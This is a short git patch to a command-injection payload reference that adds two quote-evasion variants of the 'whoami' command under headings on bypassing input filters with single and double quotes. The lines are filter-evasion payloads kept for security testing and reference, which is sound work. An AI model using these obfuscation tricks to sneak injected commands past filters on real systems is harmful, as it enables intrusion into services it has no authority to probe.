From 77f83c18b35b2f5c4462058d2a8f2ab187c85deb Mon Sep 17 00:00:00 2001 From: Xhoenix <86168235+Xhoenix@users.noreply.github.com> Date: Fri, 6 Sep 2024 19:09:46 +0530 Subject: [PATCH] update quote evasion payloads --- Command Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index 08026da..015c623 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -266,6 +266,7 @@ root:x:0:0:root:/root:/bin/bash ```powershell w'h'o'am'i wh''oami +'w'hoami ``` #### Bypass with double quote @@ -273,6 +274,7 @@ wh''oami ```powershell w"h"o"am"i wh""oami +"wh"oami ``` #### Bypass with backticks